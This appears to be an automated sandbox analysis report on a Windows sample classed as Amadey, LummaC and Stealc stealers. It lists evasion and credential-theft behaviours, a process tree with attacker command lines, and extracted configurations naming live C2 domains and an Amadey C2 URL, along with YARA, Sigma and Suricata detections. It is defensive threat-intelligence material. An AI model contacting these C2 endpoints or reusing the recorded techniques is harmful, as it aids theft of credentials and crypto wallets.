Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1579386
MD5:	cf6393e173fb6315d0c681bc78eb3528
SHA1:	26dc307ae4ea1866d40c9a34e38768733ec30b34
SHA256:	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d
Tags:	Amadeyexeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys Clipper DLL

Yara detected Amadeys stealer DLL

Yara detected Credential Flusher

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Creates files in the system32 config directory

Creates multiple autostart registry keys

Drops PE files to the document folder of the user

Drops large PE files

Drops password protected ZIP file

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Leaks process information

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes many files with high entropy

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables security privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a Chrome extension

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Chromium Browser Instance Executed With Custom Extension

Sigma detected: CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CF6393E173FB6315D0C681BC78EB3528)

skotes.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: CF6393E173FB6315D0C681BC78EB3528)

skotes.exe (PID: 2472 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: CF6393E173FB6315D0C681BC78EB3528)

af155ed129.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe" MD5: 87330F1877C33A5A6203C49075223B16)

cd2469328d.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)

conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cd2469328d.exe (PID: 7808 cmdline: "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)

cd2469328d.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)

5cda6c90d7.exe (PID: 5040 cmdline: "C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe" MD5: 15709EBA2AFAF7CC0A86CE0ABF8E53F1)

7739517025.exe (PID: 4956 cmdline: "C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe" MD5: 51FF79B406CB223DD49DD4C947EC97B0)

Gxtuum.exe (PID: 5812 cmdline: "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe" MD5: 51FF79B406CB223DD49DD4C947EC97B0)

cc6f25572f.exe (PID: 2212 cmdline: "C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe" MD5: 3567CB15156760B2F111512FFDBC1451)

graph.exe (PID: 8168 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

chrome.exe (PID: 5788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1564 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2004,i,2036866093412023983,10134248747286953754,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2328,i,6628927633879078987,5168946575575726865,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

b6638733e4.exe (PID: 2648 cmdline: "C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe" MD5: A42B5A11FB98E17DCA2EA358EAC541DE)

chrome.exe (PID: 5236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

b05c9e01f3.exe (PID: 3896 cmdline: "C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe" MD5: 17830E6496A4FA2D4DC73BA36CE61725)

fed209a298.exe (PID: 2996 cmdline: "C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)

cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mode.com (PID: 4548 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)

7z.exe (PID: 3156 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 2916 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 1816 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 2496 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 6200 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 6540 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 7916 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

7z.exe (PID: 5716 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)

attrib.exe (PID: 7668 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

in.exe (PID: 3900 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)

c9d0f96e57.exe (PID: 5548 cmdline: "C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe" MD5: 63941836D5C054B13AE7B96F743C38CB)

142c991362.exe (PID: 7012 cmdline: "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe" MD5: F417402BF33D99A0AF654DFBF7042087)

35f0a75b93.exe (PID: 7748 cmdline: "C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe" MD5: F853C23F7A2641FEB4E4B94F59728314)

2e4e1b8516.exe (PID: 4904 cmdline: "C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe" MD5: 58F6FD6BFBBB99454234A6099D39E954)

Gxtuum.exe (PID: 5172 cmdline: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe MD5: 51FF79B406CB223DD49DD4C947EC97B0)

cc6f25572f.exe (PID: 4628 cmdline: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe MD5: 3567CB15156760B2F111512FFDBC1451)

graph.exe (PID: 6692 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

graph.exe (PID: 7300 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

chrome.exe (PID: 5472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1516 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,12670110117547472489,9919710974034133825,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,9689288529753768681,16251776256977340336,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

graph.exe (PID: 2024 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)

chrome.exe (PID: 7448 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

142c991362.exe (PID: 348 cmdline: "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe" MD5: F417402BF33D99A0AF654DFBF7042087)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: LummaC

{"C2 url": ["cheapptaxysu.click", "necklacebudi.lat", "aspecteirs.lat", "crosshuaht.lat", "rapeflowwj.lat", "discokeyus.lat", "sustainskelet.lat", "grannyejh.lat", "energyaffai.lat"], "Build id": "CZJvss--geopoxid"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\output[1].png	INDICATOR_SUSPICIOUS_IMG_Embedded_Archive	Detects images embedding archives. Observed in TheRat RAT.	ditekSHen	0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
0000000B.00000003.2690845654.0000000000D94000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000003.2690960983.0000000000D98000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002B.00000003.3493806478.0000000005110000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000C.00000003.2773819917.00000000017B9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000003.2773670606.0000000001810000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000003.2774094257.00000000017DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000003.2773960939.00000000017BB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cd2469328d.exe PID: 7820	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cd2469328d.exe PID: 7820	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 5cda6c90d7.exe PID: 5040	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 5cda6c90d7.exe PID: 5040	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 5cda6c90d7.exe PID: 5040	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 142c991362.exe PID: 7012	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 35f0a75b93.exe PID: 7748	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 35f0a75b93.exe PID: 7748	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 2e4e1b8516.exe PID: 4904	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author
14.2.Gxtuum.exe.aa0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
13.2.7739517025.exe.530000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
14.0.Gxtuum.exe.aa0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
15.0.Gxtuum.exe.aa0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
13.0.7739517025.exe.530000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
1.2.skotes.exe.9a0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.850000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2472, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\142c991362.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe, ParentProcessId: 2648, ParentProcessName: b6638733e4.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default", ProcessId: 5236, ProcessName: chrome.exe

Sigma detected: Chromium Browser Instance Executed With Custom Extension

Source: Process started

Author: Aedan Russell, frack113, X__Junior (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="", CommandLine|base64offset|contains: , Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Program Files\Windows Media Player\graph\graph.exe" , ParentImage: C:\Program Files\Windows Media Player\graph\graph.exe, ParentProcessId: 7300, ParentProcessName: graph.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="", ProcessId: 5472, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2472, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\142c991362.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-22T02:16:29.118059+0100	2028371	3	Unknown Traffic	192.168.2.4	49806	172.67.209.202	443	TCP
2024-12-22T02:16:31.600922+0100	2028371	3	Unknown Traffic	192.168.2.4	49814	172.67.209.202	443	TCP
2024-12-22T02:16:35.270547+0100	2028371	3	Unknown Traffic	192.168.2.4	49822	172.67.209.202	443	TCP
2024-12-22T02:16:35.730536+0100	2028371	3	Unknown Traffic	192.168.2.4	49823	104.21.67.146	443	TCP
2024-12-22T02:16:37.412391+0100	2028371	3	Unknown Traffic	192.168.2.4	49831	104.21.67.146	443	TCP
2024-12-22T02:16:37.742476+0100	2028371	3	Unknown Traffic	192.168.2.4	49832	172.67.209.202	443	TCP
2024-12-22T02:16:40.187887+0100	2028371	3	Unknown Traffic	192.168.2.4	49837	172.67.209.202	443	TCP
2024-12-22T02:16:42.967084+0100	2028371	3	Unknown Traffic	192.168.2.4	49843	172.67.209.202	443	TCP
2024-12-22T02:16:43.035757+0100	2028371	3	Unknown Traffic	192.168.2.4	49844	104.21.67.146	443	TCP
2024-12-22T02:16:45.360976+0100	2028371	3	Unknown Traffic	192.168.2.4	49852	104.21.67.146	443	TCP
2024-12-22T02:16:45.744612+0100	2028371	3	Unknown Traffic	192.168.2.4	49858	172.67.209.202	443	TCP
2024-12-22T02:16:48.149320+0100	2028371	3	Unknown Traffic	192.168.2.4	49863	104.21.67.146	443	TCP
2024-12-22T02:16:50.956303+0100	2028371	3	Unknown Traffic	192.168.2.4	49875	172.67.209.202	443	TCP
2024-12-22T02:16:51.289707+0100	2028371	3	Unknown Traffic	192.168.2.4	49876	104.21.67.146	443	TCP
2024-12-22T02:16:54.041776+0100	2028371	3	Unknown Traffic	192.168.2.4	49885	104.21.67.146	443	TCP
2024-12-22T02:16:57.698061+0100	2028371	3	Unknown Traffic	192.168.2.4	49897	104.21.67.146	443	TCP
2024-12-22T02:17:53.710812+0100	2028371	3	Unknown Traffic	192.168.2.4	50060	104.21.21.99	443	TCP
2024-12-22T02:17:56.390951+0100	2028371	3	Unknown Traffic	192.168.2.4	50068	104.21.21.99	443	TCP
2024-12-22T02:18:11.249239+0100	2028371	3	Unknown Traffic	192.168.2.4	50120	104.21.21.99	443	TCP
2024-12-22T02:18:13.327037+0100	2028371	3	Unknown Traffic	192.168.2.4	50125	104.21.21.99	443	TCP
2024-12-22T02:18:13.727782+0100	2028371	3	Unknown Traffic	192.168.2.4	50128	104.21.21.99	443	TCP
2024-12-22T02:18:15.853049+0100	2028371	3	Unknown Traffic	192.168.2.4	50134	104.21.21.99	443	TCP
2024-12-22T02:18:19.112536+0100	2028371	3	Unknown Traffic	192.168.2.4	50140	104.21.21.99	443	TCP
2024-12-22T02:18:20.871417+0100	2028371	3	Unknown Traffic	192.168.2.4	50141	104.21.21.99	443	TCP
2024-12-22T02:18:26.676005+0100	2028371	3	Unknown Traffic	192.168.2.4	50157	104.21.21.99	443	TCP
2024-12-22T02:18:27.288592+0100	2028371	3	Unknown Traffic	192.168.2.4	50158	104.21.21.99	443	TCP
2024-12-22T02:18:31.148526+0100	2028371	3	Unknown Traffic	192.168.2.4	50162	104.21.21.99	443	TCP
2024-12-22T02:18:35.225117+0100	2028371	3	Unknown Traffic	192.168.2.4	50168	104.21.21.99	443	TCP
2024-12-22T02:18:35.564629+0100	2028371	3	Unknown Traffic	192.168.2.4	50169	104.21.21.99	443	TCP
2024-12-22T02:18:40.872079+0100	2028371	3	Unknown Traffic	192.168.2.4	50174	104.21.21.99	443	TCP
2024-12-22T02:18:42.523962+0100	2028371	3	Unknown Traffic	192.168.2.4	50177	104.21.21.99	443	TCP
2024-12-22T02:18:44.392432+0100	2028371	3	Unknown Traffic	192.168.2.4	50180	104.21.21.99	443	TCP
2024-12-22T02:18:46.898718+0100	2028371	3	Unknown Traffic	192.168.2.4	50185	104.21.89.115	443	TCP
2024-12-22T02:18:47.155471+0100	2028371	3	Unknown Traffic	192.168.2.4	50186	104.21.21.99	443	TCP
2024-12-22T02:18:47.244318+0100	2028371	3	Unknown Traffic	192.168.2.4	50189	104.21.21.99	443	TCP
2024-12-22T02:18:49.505434+0100	2028371	3	Unknown Traffic	192.168.2.4	50205	104.21.89.115	443	TCP
2024-12-22T02:18:51.583167+0100	2028371	3	Unknown Traffic	192.168.2.4	50222	104.21.21.99	443	TCP
2024-12-22T02:18:54.202297+0100	2028371	3	Unknown Traffic	192.168.2.4	50238	104.21.21.99	443	TCP
2024-12-22T02:18:54.451679+0100	2028371	3	Unknown Traffic	192.168.2.4	50240	104.21.67.146	443	TCP
2024-12-22T02:18:55.118304+0100	2028371	3	Unknown Traffic	192.168.2.4	50242	104.21.89.115	443	TCP
2024-12-22T02:18:56.513771+0100	2028371	3	Unknown Traffic	192.168.2.4	50246	104.21.21.99	443	TCP
2024-12-22T02:18:56.542531+0100	2028371	3	Unknown Traffic	192.168.2.4	50247	104.21.67.146	443	TCP
2024-12-22T02:18:57.563608+0100	2028371	3	Unknown Traffic	192.168.2.4	50250	104.21.89.115	443	TCP
2024-12-22T02:18:59.069531+0100	2028371	3	Unknown Traffic	192.168.2.4	50253	104.21.21.99	443	TCP
2024-12-22T02:18:59.716293+0100	2028371	3	Unknown Traffic	192.168.2.4	50254	104.21.89.115	443	TCP
2024-12-22T02:19:02.605590+0100	2028371	3	Unknown Traffic	192.168.2.4	50263	104.21.89.115	443	TCP
2024-12-22T02:19:03.057225+0100	2028371	3	Unknown Traffic	192.168.2.4	50264	104.21.67.146	443	TCP
2024-12-22T02:19:05.407782+0100	2028371	3	Unknown Traffic	192.168.2.4	50274	104.21.67.146	443	TCP
2024-12-22T02:19:05.778609+0100	2028371	3	Unknown Traffic	192.168.2.4	50276	104.21.21.99	443	TCP
